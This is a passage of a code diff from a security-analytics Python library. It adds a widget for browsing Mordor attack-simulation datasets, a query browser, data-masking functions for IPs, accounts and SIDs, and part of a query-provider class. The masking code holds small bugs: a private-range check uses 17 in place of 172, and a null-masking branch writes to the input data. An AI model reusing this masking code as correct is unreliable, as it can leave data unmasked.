+        ds_select.observe(self._select_ds_item, names="value")
+        self._select_ds_item({"new": next(iter(self.mdr_metadata.keys()))})
+        self.widgets["ds_select"] = ds_select
+
+    def _init_field_ctls(self):
+        """Initialize the data field controls."""
+        fields = {}
+        dl_button = None
+        for field, field_attrs in MORDOR_FIELDS.items():
+            if field == "file_paths":
+                dl_button = widgets.Button(description="Download")
+                fields[field] = widgets.HBox(
+                    [
+                        widgets.Select(
+                            description=field,
+                            layout=self.layouts["layout_norm"],
+                            style=self.w_style,
+                        ),
+                        dl_button,
+                    ]
+                )
+            elif field == "simulation":
+                fields[field] = field_attrs["widget"](
+                    description=field,
+                    layout=self.layouts["layout_high"],
+                    style=self.w_style,
+                )
+            else:
+                fields[field] = field_attrs["widget"](
+                    description=field,
+                    layout=self.layouts["layout_norm"],
+                    style=self.w_style,
+                )
+        self.widgets["fields"] = fields
+
+        if dl_button is not None:
+            self.widgets["wgt_dl_button"] = dl_button
+            dl_button.on_click(self._download_file)
+
+    def _clear_fields(self):
+        """Clear data fields (when nothing is selected)."""
+        for field in MORDOR_FIELDS:
+            if field == "file_paths":
+                self.fields[field].children[0].options = []
+            else:
+                self.fields[field].value = ""
+        self._clear_df_display()
+
+    def _select_ds_item(self, change):  # noqa: MC0001
+        """Handle change of dataset selection."""
+        item_id = change.get("new")
+        mdr_item = self.mdr_metadata.get(item_id)
+        if not mdr_item:
+            self._clear_fields()
+            return
+
+        for field, field_attrs in MORDOR_FIELDS.items():
+            if mdr_item and field_attrs["type"] != "cust":
+                value = getattr(mdr_item, field)
+            else:
+                value = None
+
+            if field_attrs["type"] == "text":
+                self.fields[field].value = str(value)
+            elif field_attrs["type"] == "list":
+                self.fields[field].value = ", ".join([str(item) for item in value])
+            elif field_attrs["type"] == "raw":
+                self.fields[field].value = pformat(value)
+            elif field == "attacks":
+                field_data = mdr_item.get_attacks()
+                self.fields[field].value = _format_attacks(field_data)
+            elif field == "file_paths":
+                file_paths = mdr_item.get_file_paths()
+                self.fields[field].children[0].options = _format_files(file_paths)
+            elif field == "notebooks":
+                self.fields[field].value = _format_notebooks(mdr_item.notebooks)
+            elif field == "query name":
+                self.fields[field].value = _format_queries(mdr_item)
+
+        self._clear_df_display()
+
+    def _update_select_list(self, event=None):
+        """Update the dataset selection list based on filters."""
+        del event
+        filtered_tech = set()
+        for t_id in self.widgets["sel_techniques"].value:
+            filtered_tech.update(self.mordor_driver.mdr_idx_tech[t_id])
+
+        filtered_tact = set()
+        for t_id in self.widgets["sel_tactics"].value:
+            filtered_tact.update(self.mordor_driver.mdr_idx_tact[t_id])
+
+        md_items_filtered = filtered_tech & filtered_tact
+        md_ids = search_mdr_data(
+            self.mdr_metadata, self.widgets["filter_text"].value, md_items_filtered
+        )
+        self.widgets["ds_select"].options = self._get_md_select_options(md_ids)
+
+    def _reset_filters(self, event=None):
+        """Reset filter controls to default."""
+        del event
+        self.widgets["sel_techniques"].value = [
+            opt[1] for opt in self.widgets["sel_techniques"].options
+        ]
+        self.widgets["sel_tactics"].value = [
+            opt[1] for opt in self.widgets["sel_tactics"].options
+        ]
+        self.widgets["filter_text"].value = ""
+        self._update_select_list()
+
+    def _get_md_select_options(self, subset: Iterable[str] = None):
+        """Return current set of datasets for select control."""
+        return [
+            (f"{mdr.id} {mdr.title} ({mdr.platform})", mdr.id)
+            for mdr in self.mdr_metadata.values()
+            if subset is None or mdr.id in subset
+        ]
+
+    def _download_file(self, event):
+        """Handle download file event."""
+        del event
+        selection = self.fields["file_paths"].children[0].value
+        if selection not in self.datasets:
+            result_df = None
+            try:
+                result_df = download_mdr_file(
+                    selection,
+                    use_cached=self._use_cached,
+                    save_folder=self._save_folder,
+                )
+            except MsticpyException:
+                pass
+            if not isinstance(result_df, pd.DataFrame) or result_df.empty:
+                result_df = HTML("Could not extract data from this file")
+            self.datasets[selection] = result_df
+        self.current_dataset = self.datasets[selection]
+        self._df_disp.update(self.datasets[selection])
+
+    @staticmethod
+    def _get_mitre_filter_options(mordor_index: Dict[str, MordorEntry], mitre_data):
+        return [
+            (f"{m_id} - {mitre_data.loc[m_id].Name}", m_id)
+            for m_id in mordor_index
+            if m_id in mitre_data.index
+        ]
+
+
+_FMT_STYLE = "border: 1px solid #AAAAAA; padding: 5px"
+
+
+def _format_attacks(attacks):
+    """Format the Mitre Attack data for display."""
+    html_text = []
+    for attack in attacks:
+        sub_tech = f" (sub: {attack.sub_technique}) " if attack.sub_technique else ""
+        html_tech = [
+            f"<p>Mitre Technique <b>{attack.technique}</b> ",
+            sub_tech,
+            f": <a href='{attack.technique_uri}' target='_blank'>",
+            f"<u>{attack.technique_name}</u></a></p>",
+            "Mitre Tactics: ",
+        ]
+
+        html_tactics = [
+            f"<b>{tactic[0]}</b>: <a href='{tactic[3]}' "
+            + f"target='_blank'><u>{tactic[1]}</u></a>"
+            for tactic in attack.tactics_full
+        ]
+
+        html_tactics = ", ".join(html_tactics)
+        html_text.append("".join([*html_tech, html_tactics]))
+    content = "<br>".join(html_text)
+    return f"<div style='{_FMT_STYLE}'>{content}</span>"
+
+
+def _format_files(files):
+    """Format the Mordor files data for display."""
+    return [
+        (f"({file['file_type']}) {file['file_path'].split('/')[-1]}", file["file_path"])
+        for file in files
+    ]
+
+
+def _format_notebooks(notebooks):
+    """Format the Mordor notebooks data for display."""
+    if not notebooks:
+        return f"<div style='{_FMT_STYLE}'>none</span>"
+    nbks = ((nbk["project"], nbk["name"], nbk["link"]) for nbk in notebooks)
+    content = "".join(
+        [
+            f"<p>{nbk[0]} - <a href='{nbk[2]}' target='_blank'><u>{nbk[1]}</u></a></p>"
+            for nbk in nbks
+        ]
+    )
+    return f"<div style='{_FMT_STYLE}'>{content}</span>"
+
+
+def _format_queries(mdr_entry):
+    return "\n".join(
+        [
+            f"{file_path['qry_path']} ({mdr_entry.title}, {mdr_entry.id})"
+            for file_path in mdr_entry.get_file_paths()
+        ]
+    )
+
+
+MORDOR_FIELDS = {
+    "title": {"type": "text", "widget": widgets.Text},
+    "id": {"type": "text", "widget": widgets.Text},
+    "type": {"type": "text", "widget": widgets.Text},
+    "contributors": {"type": "list", "widget": widgets.Text},
+    "creation_date": {"type": "text", "widget": widgets.Text},
+    "modification_date": {"type": "text", "widget": widgets.Text},
+    "platform": {"type": "text", "widget": widgets.Text},
+    "description": {"type": "text", "widget": widgets.Textarea},
+    "tags": {"type": "list", "widget": widgets.Text},
+    "file_paths": {
+        "type": "cust",
+        "widget": widgets.Select,
+        "method": "get_file_paths",
+        "formatter": _format_files,
+    },
+    "attacks": {
+        "type": "cust",
+        "widget": widgets.HTML,
+        "method": "get_attacks",
+        "formatter": _format_attacks,
+    },
+    "notebooks": {"type": "cust", "widget": widgets.HTML},
+    "simulation": {"type": "raw", "widget": widgets.Textarea},
+    "references": {"type": "raw", "widget": widgets.Textarea},
+    "query name": {"type": "cust", "widget": widgets.Textarea},
+}
diff --git a/msticpy/data/browsers/query_browser.py b/msticpy/data/browsers/query_browser.py
new file mode 100644
index 000000000..ac3c627c3
--- /dev/null
+++ b/msticpy/data/browsers/query_browser.py
@@ -0,0 +1,96 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""QueryProvider Query Browser."""
+import textwrap
+from typing import Generator, Any
+
+from IPython.display import HTML
+
+from ..._version import VERSION
+from ...nbtools.nbwidgets import SelectItem
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def browse_queries(query_provider: Any, **kwargs) -> SelectItem:
+    """
+    Return QueryProvider query browser.
+
+    Parameters
+    ----------
+    query_provider : QueryProvider
+        Initialized query provider.
+
+    Other Parameters
+    ----------------
+    kwargs :
+        passed to SelectItem constuctor.
+
+    Returns
+    -------
+    SelectItem
+        SelectItem browser for TI Data.
+
+    """
+    if "height" not in kwargs:
+        kwargs["height"] = "300px"
+    disp_func = _query_display_func(query_provider)
+    opts = query_provider.list_queries()
+    return SelectItem(item_list=opts, action=disp_func, **kwargs)
+
+
+def _format_query_doc(query_doc) -> Generator[str, None, None]:
+    """Format query docstring as HTML."""
+    qdoc_lines = query_doc.split("\n")
+    yield f"<h3>{qdoc_lines[0]}</h3>"
+    for line in qdoc_lines[1:]:
+        if line.strip() == "Parameters":
+            yield f"<p><b>{line}</b></p>"
+        elif line.strip().startswith("---"):
+            continue
+        else:
+            indent = len(line) - len(line.strip())
+            if indent:
+                indent *= 10
+                yield f"<div style='margin-left: {indent}px'>{line}</div>"
+            else:
+                yield f"<div>{line}</div>"
+
+
+def _format_query(query_text):
+    """Format query for display."""
+    q_lines = []
+    for line in query_text.split("|"):
+        if len(line) > 80:
+            line = "\n  ".join(textwrap.wrap(line))
+        q_lines.append(line)
+    q_text = "\n|".join(q_lines)
+    return f"<p><b>Query</b></p><pre>{q_text}</pre>"
+
+
+def _get_query_sample(query):
+    """Format query sample."""
+    return f"""
+        <p><b>Example</b></p>
+        <p>{{QueryProvider}}[.QueryPath].QueryName(params...)</p>
+        <pre>qry_prov.{query}(start=start, end=end, hostname=host)</pre>
+    """
+
+
+def _query_display_func(query_provider):
+    """Closure returning function to display query."""
+
+    def get_query_doc(query):
+        """Return doc string and query as HTML."""
+        query_func = getattr(query_provider, query)
+        q_help = "".join(_format_query_doc(query_func.__doc__))
+        q_text = query_provider.get_query(query).strip()
+        q_sample = _get_query_sample(query)
+        q_text = _format_query(q_text)
+        return HTML(f"{q_help}<br>{q_text}<br>{q_sample}")
+
+    return get_query_doc
diff --git a/msticpy/data/data_obfus.py b/msticpy/data/data_obfus.py
new file mode 100644
index 000000000..3d4906a8f
--- /dev/null
+++ b/msticpy/data/data_obfus.py
@@ -0,0 +1,547 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data obfuscation functions."""
+import hashlib
+import pkgutil
+import re
+import uuid
+import warnings
+from functools import lru_cache
+from typing import Any, Callable, Dict, List, Mapping, Optional, Tuple, Union
+
+import numpy as np
+import pandas as pd
+import yaml
+
+OBFUS_COL_MAP: Dict[str, str] = {}
+_MAP_FILE = "resources/obfuscation_cols.yaml"
+_obfus_map_file = pkgutil.get_data("msticpy", _MAP_FILE)
+if not _obfus_map_file:
+    warnings.warn(f"Could not find obfuscation column map {_MAP_FILE}")
+else:
+    _obfus_dicts = yaml.safe_load(_obfus_map_file)
+    for data_col_map in _obfus_dicts.values():
+        OBFUS_COL_MAP.update(data_col_map)
+
+
+def hash_string(input_str: str) -> str:
+    """
+    Hash a simple string.
+
+    Parameters
+    ----------
+    input_str : str
+        The input string
+
+    Returns
+    -------
+    str
+        The obfuscated output string
+
+    """
+    if not input_str:
+        return input_str
+    if not isinstance(input_str, str):
+        input_str = str(input_str)
+    str_dig = hashlib.sha256(bytes(input_str, "utf-8")).hexdigest()
+    factor = int(len(input_str) / len(str_dig))
+    out_str = (str_dig * max(factor, 1))[: len(input_str)]
+    if not input_str.isnumeric():
+        return "".join([chr(int(c) + 105) if c.isdigit() else c for c in out_str])
+    # Convert entirely numeric strings to numbers
+    return "".join([c if c.isdigit() else str(ord(c) - 97) for c in out_str])
+
+
+@lru_cache(maxsize=1024)
+def hash_item(input_item: str, delim: str = None) -> str:
+    """
+    Hash a simple string.
+
+    Parameters
+    ----------
+    input_item : str
+        The input string
+    delim: str, optional
+        A string of delimiters to use to split the input string
+        prior to hashing.
+
+    Returns
+    -------
+    str
+        The obfuscated output string
+
+    """
+    if not input_item or not isinstance(input_item, str):
+        return input_item
+    if not delim:
+        return hash_string(input_item)
+    if len(delim) == 1:
+        return delim.join([hash_string(elem) for elem in input_item.split(delim)])
+
+    out_str = input_item
+    delim_char = delim[0]
+    delim_rest = delim[1:]
+    for str_item in out_str.split(delim_char):
+        out_str = out_str.replace(str_item, hash_item(str_item, delim_rest))
+    return out_str
+
+
+# Create a random map for shuffling IP address components
+ip_map: List[Dict[str, str]] = []
+for _ in range(4):
+    rng = np.random.default_rng()
+    ip_list = [str(n) for n in np.arange(256)]
+    rand_list = ip_list.copy()
+    rng.shuffle(rand_list)
+    ip_map.append(dict(zip(ip_list, rand_list)))
+
+
+@lru_cache(maxsize=1024)
+def _hash_ip_item(ip_addr: str) -> str:
+    """
+    Hash IP address.
+
+    Parameters
+    ----------
+    ip_addr : str
+        IP address string
+
+    Returns
+    -------
+    str
+        Hashed IP Address.
+
+    """
+    if not ip_addr or not isinstance(ip_addr, str):
+        return ip_addr
+    if "." in ip_addr:
+        return _map_ip4_address(ip_addr)
+    if ":" in ip_addr:
+        if ip_addr.strip() == "::1":
+            # Localhost
+            return ip_addr
+        ip_out = []
+        for part in ip_addr.split(":"):
+            enc = hashlib.sha256(bytes(part, "utf-8")).hexdigest()[: len(part)]
+            ip_out.append(enc)
+        return ":".join(ip_out)
+    return hashlib.sha256(bytes(ip_addr, "utf-8")).hexdigest()[: len(ip_addr)]
+
+
+_WK_IPV4 = set(["0.0.0.0", "127.0.0.1", "255.255.255.255"])  # nosec
+
+
+def _map_ip4_address(ip_addr: str) -> str:
+    try:
+        ip_bytes = [int(byte) for byte in ip_addr.split(".")]
+    except ValueError:
+        return hash_string(ip_addr)
+    if ".".join(str(byte) for byte in ip_bytes) in _WK_IPV4:
+        # Well-known address
+        return ip_addr
+    if ip_bytes[0] == 10:
+        # class A res private
+        ls_bytes = ".".join(
+            [
+                ip_map[idx].get(byte, "1")
+                for idx, byte in enumerate(ip_addr.split(".")[1:])
+            ]
+        )
+        return f"10.{ls_bytes}"
+    if ip_bytes[0] == 17 and (16 <= ip_bytes[1] <= 31):
+        # class B res private
+        ls_bytes = ".".join(
+            [
+                ip_map[idx].get(byte, "1")
+                for idx, byte in enumerate(ip_addr.split(".")[2:])
+            ]
+        )
+        return f"{ip_bytes[0]}.{ip_bytes[1]}.{ls_bytes}"
+    if ip_bytes[0] == 192 and ip_bytes[1] == 168:
+        # class C res private
+        ls_bytes = ".".join(
+            [
+                ip_map[idx].get(byte, "1")
+                for idx, byte in enumerate(ip_addr.split(".")[2:])
+            ]
+        )
+        return f"192.168.{ls_bytes}"
+    # by default, remap all
+    return ".".join(
+        [ip_map[idx].get(byte, "1") for idx, byte in enumerate(ip_addr.split("."))]
+    )
+
+
+def hash_ip(input_item: Union[List[str], str]) -> Union[List[str], str]:
+    """
+    Hash IP address or list of IP addresses.
+
+    Parameters
+    ----------
+    input_item : Union[List[str], str]
+        List of IP addresses or single IP address.
+
+    Returns
+    -------
+    Union[List[str], str]
+        List of hashed addresses or single address.
+        (depending on input)
+
+    """
+    if not input_item:
+        return input_item
+    if isinstance(input_item, list):
+        return [_hash_ip_item(elem) for elem in input_item]
+    return _hash_ip_item(input_item)
+
+
+def hash_list(item_list: List[str]) -> List[str]:
+    """
+    Hash list of strings.
+
+    Parameters
+    ----------
+    item_list : List[str]
+        Input list
+
+    Returns
+    -------
+    List[str]
+        Hashed list
+
+    """
+    out_list = []
+    for val in item_list:
+        if isinstance(val, dict):
+            hash_val = hash_dict(val)
+        elif isinstance(val, list):
+            hash_val = hash_list(val)
+        else:
+            hash_val = hash_string(val)
+        out_list.append(hash_val)
+    return out_list
+
+
+def hash_dict(
+    item_dict: Dict[str, Union[Dict[str, Any], List[Any], str]]
+) -> Dict[str, Any]:
+    """
+    Hash dictionary values.
+
+    Parameters
+    ----------
+    item_dict : Dict[str, Union[Dict[str, Any], List[Any], str]]
+        Input item can be a Dict of strings, lists or other
+        dictionaries.
+
+    Returns
+    -------
+    Dict[str, Any]
+        Dictionary with hashed values.
+
+    """
+    out_dict = {}
+    for key, val in item_dict.items():
+        if isinstance(val, dict):
+            hash_val = hash_dict(val)
+        elif isinstance(val, list):
+            hash_val = hash_list(val)  # type: ignore
+        else:
+            hash_val = hash_string(val)  # type: ignore
+        out_dict[key] = hash_val
+    return out_dict
+
+
+WK_SID_PATTERN = re.compile(r"S(-\d+){3}$")
+SID_PATTERN = re.compile(r"(S(?:-\d+){3})((?:-\d+){3})(-\d+)$")
+
+
+@lru_cache(maxsize=1024)
+def hash_sid(sid: str) -> str:
+    """
+    Hash a SID preserving well-known SIDs and the RID.
+
+    Parameters
+    ----------
+    sid : str
+        SID string
+
+    Returns
+    -------
+    str
+        Hashed SID
+
+    """
+    if re.match(WK_SID_PATTERN, sid):
+        return sid
+    usr_sid = re.match(SID_PATTERN, sid)
+    if usr_sid:
+        return (
+            f"{usr_sid.groups()[0]}{hash_item(usr_sid.groups()[1], delim='-')}"
+            + f"{usr_sid.groups()[2]}"
+        )
+    return sid
+
+
+_WK_ACCOUNTS = set(
+    [
+        "administrator",
+        "guest",
+        "system",
+        "local service",
+        "network service",
+        "root",
+        "crontab",
+        "nt authority",
+    ]
+)
+
+
+@lru_cache(maxsize=1024)
+def hash_account(account: str) -> str:
+    """
+    Hash an Account to something recognizable.
+
+    Parameters
+    ----------
+    account : str
+        Account name (UPN, NT or simple name)
+
+    Returns
+    -------
+    str
+        Hashed Account
+
+    """
+    if "@" in account:
+        acct_type = "UPN"
+        user, domain = account.split("@")
+    elif "/" in account:
+        acct_type = "NT"
+        domain, user = account.split("/")
+    else:
+        acct_type = "NO DOM"
+        user, domain = account, ""
+
+    if user.lower() not in _WK_ACCOUNTS:
+        user_hash = hashlib.sha256(bytes(user, "utf-8")).digest()
+        user_num = sum(user_hash[:16]) * sum(user_hash[16:]) // 199
+        user = f"account-#{user_num}"
+    if domain.lower() not in _WK_ACCOUNTS:
+        domain = hash_item(domain, ".")
+
+    if acct_type == "UPN":
+        return f"{user}@{domain}"
+    if acct_type == "NT":
+        return f"{domain}/{user}"
+    return user
+
+
+def _guid_replacer() -> Callable[[str], str]:
+    """
+    Closure for replace_guid.
+
+    Returns
+    -------
+    Callable[[str], str]
+        replace_guid function
+
+    """
+    guid_map: Dict[str, str] = {}
+
+    def _replace_guid(guid: str) -> str:
+        """
+        Replace GUID/UUID with mapped random UUID.
+
+        Parameters
+        ----------
+        guid : str
+            Input UUID.
+
+        Returns
+        -------
+        str
+            Mapped UUID
+
+        """
+        if not guid or not isinstance(guid, str):
+            return guid
+
+        if guid in guid_map:
+            return guid_map[guid]
+        new_guid = str(uuid.uuid4())
+        guid_map[guid] = new_guid
+        return new_guid
+
+    return _replace_guid
+
+
+replace_guid = _guid_replacer()
+
+
+# DataFrame obfuscation functions
+
+# Map codes to functions
+MAP_FUNCS: Dict[str, Union[str, Callable]] = {
+    "uuid": replace_guid,
+    "ip": hash_ip,
+    "str": hash_string,
+    "dict": hash_dict,
+    "list": hash_list,
+    "sid": hash_sid,
+    "acct": hash_account,
+    "null": "null",
+}
+
+
+def mask_df(  # noqa: MC0001
+    data: pd.DataFrame,
+    column_map: Mapping[str, Any] = None,
+    use_default: bool = True,
+    silent: bool = True,
+) -> pd.DataFrame:
+    """
+    Obfuscate columns of a DataFrame.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input dataframe
+    column_map : Mapping[str, Any], optional
+        Custom column mapping, by default None
+    use_default: bool
+        If True use the built-in map (adding any custom
+        mappings to this dictionary)
+    silent: bool
+        If False the function returns progress output,
+        by default True.
+
+    Returns
+    -------
+    pd.DataFrame
+        Obfuscated dataframe.
+
+    """
+    col_map = OBFUS_COL_MAP.copy() if use_default else {}
+    if column_map is not None:
+        col_map.update(column_map)
+
+    out_df = data.copy()
+    if not silent:
+        print("obfuscating columns:")
+    for col_name in data.columns:
+        if col_name not in col_map:
+            continue
+        col_type = col_map.get(col_name, "str")
+        if not silent:
+            print(col_name, end=", ")
+        map_func = MAP_FUNCS.get(col_type)
+        try:
+            if map_func == "null":
+                data[col_name] = None
+            elif map_func is not None and callable(map_func):
+                out_df[col_name] = out_df.apply(
+                    lambda x, col=col_name, func=map_func: func(x[col]), axis=1
+                )
+            else:
+                out_df[col_name] = out_df.apply(
+                    lambda x, col=col_name, c_type=col_type: hash_item(x[col], c_type),
+                    axis=1,
+                )
+        except Exception as err:
+            print(col_name, str(err))
+            raise
+
+    if not silent:
+        print("\ndone")
+    return out_df
+
+
+def check_masking(
+    data: pd.DataFrame, orig_data: pd.DataFrame, index: int = 0, silent=True
+) -> Optional[Tuple[List[str], List[str]]]:
+    """
+    Check the obfuscation results for a row.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Obfuscated DataFrame
+    orig_data : pd.DataFrame
+        Original DataFrame
+    index : int, optional
+        The row to check, by default 0
+    silent: bool
+        If False the function returns no output and
+        returns lists of changed and unchanged columns.
+        By default, True
+
+    Returns
+    -------
+    Optional[Tuple[List[str], List[str]]] :
+        If silent is True returns a tuple of unchanged, changed
+        items. If False, returns None.
+
+    """
+    unchanged = []
+    obfuscated = []
+    for col in sorted(data.columns):
+        if data.iloc[index][col] == orig_data.iloc[index][col]:
+            unchanged.append(f"{col}: {data.iloc[index][col]}")
+        else:
+            obfuscated.append(
+                f"{col}:   {orig_data.iloc[index][col]} ----> {data.iloc[index][col]}"
+            )
+    if not silent:
+        print("===== Start Check ====")
+        print("Unchanged columns:")
+        print("------------------")
+        print("\n".join(unchanged))
+        print("\nObfuscated columns:")
+        print("--------------------")
+        print("\n".join(obfuscated))
+        print("====== End Check =====")
+        return None
+
+    return unchanged, obfuscated
+
+
+# alertnative names for backward compat
+obfuscate_df = mask_df
+check_obfuscation = check_masking
+
+
+@pd.api.extensions.register_dataframe_accessor("mp_mask")
+class ObfuscationAccessor:
+    """Base64 Unpack pandas extension."""
+
+    def __init__(self, pandas_obj):
+        """Initialize the extension."""
+        self._df = pandas_obj
+
+    def mask(
+        self, column_map: Mapping[str, Any] = None, use_default: bool = True
+    ) -> pd.DataFrame:
+        """
+        Obfuscate the data in columns of a pandas dataframe.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            dataframe containing column to obfuscate
+        column_map : Mapping[str, Any], optional
+            Custom column mapping, by default None
+        use_default: bool
+            If True use the built-in map (adding any custom
+            mappings to this dictionary)
+
+        Returns
+        -------
+        pd.DataFrame
+            Obfuscated dataframe
+
+        """
+        return mask_df(data=self._df, column_map=column_map, use_default=use_default)
diff --git a/msticpy/data/data_providers.py b/msticpy/data/data_providers.py
new file mode 100644
index 000000000..7462207a0
--- /dev/null
+++ b/msticpy/data/data_providers.py
@@ -0,0 +1,630 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data provider loader."""
+from datetime import datetime
+from functools import partial
+from itertools import tee
+from pathlib import Path
+from typing import Any, Dict, Iterable, List, Optional, Union
+
+import pandas as pd
+from tqdm.auto import tqdm
+
+from .._version import VERSION
+from ..common import pkg_config as config
+from ..common.exceptions import MsticpyDataQueryError
+from ..common.utility import export, valid_pyname
+from ..nbtools.nbwidgets import QueryTime
+from .browsers.query_browser import browse_queries
+from .drivers import import_driver, DriverBase
+from .param_extractor import extract_query_params
+from .query_container import QueryContainer
+from .query_defns import DataEnvironment
+from .query_source import QuerySource
+from .query_store import QueryStore
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_DB_QUERY_FLAGS = ("print", "debug_query", "print_query")
+
+
+@export
+class QueryProvider:
+    """
+    Container for query store and query execution provider.
+
+    Instances of this class hold the query set and execution
+    methods for a specific data environment.
+
+    """
+
+    def __init__(  # noqa: MC0001
+        self,
+        data_environment: Union[str, DataEnvironment],
+        driver: DriverBase = None,
+        query_paths: List[str] = None,
+        **kwargs,
+    ):
+        """
+        Query provider interface to queries.
+
+        Parameters
+        ----------
+        data_environment : Union[str, DataEnvironment]
+            Name or Enum of environment for the QueryProvider
+        driver : DriverBase, optional
+            Override the builtin driver (query execution class)
+            and use your own driver (must inherit from
+            `DriverBase`)
+        query_paths : List[str]
+            Additional paths to look for query definitions.
+        kwargs :
+            Other arguments are passed to the data provider driver.
+
+        See Also
+        --------
+        DataProviderBase : base class for data query providers.
+
+        """
+        if isinstance(data_environment, str):
+            data_env = DataEnvironment.parse(data_environment)
+            if data_env != DataEnvironment.Unknown:
+                data_environment = data_env
+            else:
+                raise TypeError(f"Unknown data environment {data_environment}")
+
+        self.environment = data_environment.name
+        self._driver_kwargs = kwargs
+        if driver is None:
+            self.driver_class = import_driver(data_environment)
+            if issubclass(self.driver_class, DriverBase):
+                driver = self.driver_class(data_environment=data_environment, **kwargs)
+            else:
+                raise LookupError(
+                    "Could not find suitable data provider for", f" {self.environment}"
+                )
+        else:
+            self.driver_class = driver.__class__
+        self._additional_connections: Dict[str, DriverBase] = {}
+        self._query_provider = driver
+        self.all_queries = QueryContainer()
+
+        # Add any query files
+        data_env_queries: Dict[str, QueryStore] = {}
+        if driver.use_query_paths:
+            data_env_queries.update(
+                self._read_queries_from_paths(query_paths=query_paths)
+            )
+        self.query_store = data_env_queries.get(
+            self.environment, QueryStore(self.environment)
+        )
+        self._add_query_functions()
+        self._query_time = QueryTime(units="day")
+
+    def __getattr__(self, name):
+        """Return the value of the named property 'name'."""
+        if "." in name:
+            parent_name, child_name = name.split(".", maxsplit=1)
+            parent = getattr(self, parent_name, None)
+            if parent:
+                return getattr(parent, child_name)
+        raise AttributeError(f"{name} is not a valid attribute.")
+
+    def connect(self, connection_str: str = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : str
+            Connection string for the data source
+
+        """
+        self._query_provider.connect(connection_str=connection_str, **kwargs)
+
+        # If the driver has any attributes to expose via the provider
+        # add those here.
+        for attr_name, attr in self._query_provider.public_attribs.items():
+            setattr(self, attr_name, attr)
+
+        # Add any built-in or dynamically retrieved queries from driver
+        if self._query_provider.has_driver_queries:
+            driver_queries = self._query_provider.driver_queries
+            self._add_driver_queries(queries=driver_queries)
+
+    def add_connection(
+        self,
+        connection_str: Optional[str] = None,
+        alias: Optional[str] = None,
+        **kwargs,
+    ):
+        """
+        Add an additional connection for the query provider.
+
+        Parameters
+        ----------
+        connection_str : Optional[str], optional
+            Connection string for the provider, by default None
+        alias : Optional[str], optional
+            Alias to use for the connection, by default None
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Other parameters passed to the driver constructor.
+
+        Notes
+        -----
+        Some drivers may accept types other than strings for the
+        `connection_str` parameter.
+
+        """
+        # create a new instance of the driver class
+        new_driver = self.driver_class(**(self._driver_kwargs))
+        # connect
+        new_driver.connect(connection_str=connection_str, **kwargs)
+        # add to collection
+        driver_key = alias or str(len(self._additional_connections))
+        self._additional_connections[driver_key] = new_driver
+
+    @property
+    def connected(self) -> bool:
+        """
+        Return True if the provider is connected.
+
+        Returns
+        -------
+        bool
+            True if the provider is connected.
+
+        """
+        return self._query_provider.connected
+
+    @property
+    def connection_string(self) -> str:
+        """
+        Return provider connection string.
+
+        Returns
+        -------
+        str
+            Provider connection string.
+
+        """
+        return self._query_provider.current_connection
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        """
+        Return current data schema of connection.
+
+        Returns
+        -------
+        Dict[str, Dict]
+            Data schema of current connection.
+
+        """
+        return self._query_provider.schema
+
+    @property
+    def schema_tables(self) -> List[str]:
+        """
+        Return list of tables in the data schema of the connection.
+
+        Returns
+        -------
+        List[str]
+            Tables in the of current connection.
+
+        """
+        return list(self._query_provider.schema.keys())
+
+    def import_query_file(self, query_file: str):
+        """
+        Import a yaml data source definition.
+
+        Parameters
+        ----------
+        query_file : str
+            Path to the file to import
+
+        """
+        self.query_store.import_file(query_file)
+        self._add_query_functions()
+
+    @classmethod
+    def list_data_environments(cls) -> List[str]:
+        """
+        Return list of current data environments.
+
+        Returns
+        -------
+        List[str]
+            List of current data environments
+
+        """
+        # pylint: disable=not-an-iterable
+        return [env for env in DataEnvironment.__members__ if env != "Unknown"]
+        # pylint: enable=not-an-iterable
+
+    def list_queries(self, substring: Optional[str] = None) -> List[str]:
+        """
+        Return list of family.query in the store.
+
+        Parameters
+        ----------
+        substring : Optional[str]
+            Optional pattern - will return only queries matching the pattern,
+            default None.
+
+        Returns
+        -------
+        List[str]
+            List of queries
+
+        """
+        if substring:
+            return list(
+                filter(
+                    lambda x: substring in x.lower(),  # type: ignore
+                    self.query_store.query_names,
+                )
+            )
+        return list(self.query_store.query_names)
+
+    def list_connections(self) -> List[str]:
+        """
+        Return a list of current connections or the default connection.
+
+        Returns
+        -------
+        List[str]
+            The alias and connection string for each connection.
+
+        """
+        add_connections = [
+            f"{alias}: {driver.current_connection}"
+            for alias, driver in self._additional_connections.items()
+        ]
+        return [f"Default: {self._query_provider.current_connection}", *add_connections]
+
+    def query_help(self, query_name: str):
+        """
+        Print help for `query_name`.
+
+        Parameters
+        ----------
+        query_name : str
+            The name of the query.
+
+        """
+        self.query_store[query_name].help()
+
+    def get_query(self, query_name: str) -> str:
+        """
+        Return the raw query text for `query_name`.
+
+        Parameters
+        ----------
+        query_name : str
+            The name of the query.
+
+        """
+        return self.query_store[query_name].query
+
+    def exec_query(self, query: str, **kwargs) -> Union[pd.DataFrame, Any]:
+        """
+        Execute simple query string.
+
+        Parameters
+        ----------
+        query : str
+            [description]
+        use_connections : Union[str, List[str]]
+
+        Other Parameters
+        ----------------
+        query_options : Dict[str, Any]
+            Additional options passed to query driver.
+        kwargs : Dict[str, Any]
+            Additional options passed to query driver.
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results - a DataFrame if successful
+            or a KqlResult if unsuccessful.
+
+        """
+        query_options = kwargs.pop("query_options", {}) or kwargs
+        query_source = kwargs.pop("query_source", None)
+        result = self._query_provider.query(
+            query, query_source=query_source, **query_options
+        )
+        if not self._additional_connections:
+            return result
+        # run query against all connections
+        results = [result]
